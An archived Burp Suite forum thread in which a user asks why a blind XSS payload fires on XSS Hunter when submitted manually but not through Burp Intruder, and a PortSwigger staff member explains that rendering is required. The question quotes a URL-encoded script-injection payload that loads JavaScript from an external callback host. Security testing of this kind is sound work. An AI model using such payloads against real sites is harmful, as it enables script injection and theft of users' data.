Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Blind XSS attacks register on XssHunter Site but not when repeated in Intruder.

Regan | Last updated: Jun 19, 2019 08:57PM UTC

Hello, I am using a blind XSS payload using XSS hunter (https://xsshunter.com). When I enter the payload manually into my test site: http://xss.in-secure.org/test.php?name=%22%3E%3Cscript%20src=https://insecureorg.xss.ht%3E%3C/script%3E It will register as received or fired on Xss Hunter's website. When I do the same attack using Burp Intruder, it does not show up on their site. Its almost like it does not process the XSS like it does when I manually submit it in the browser. I have tried encoding the URL in Burp Intruder options ans also turning encoding off. I get a response code 200 and it looks ok. I just tried the render tab in the response and the hit showed up suddenly in Xss Hunter's site. If I iterate through an entire list of payloads do I need to use the render tab through them all or is there something i'm missing? Thank you, Regan

PortSwigger Agent | Last updated: Jun 21, 2019 10:47AM UTC

Hi Regan, Yes, requests to xsshunter only occur when the page is rendered. That technique is good for blind XSS, but not the most efficient for XSS where you can see the response - as you can in this example. You can use Burp Scanner to check for XSS directly and it includes a blind XSS payload that uses Burp Collaborator.

Burp User | Last updated: Jan 08, 2020 07:28AM UTC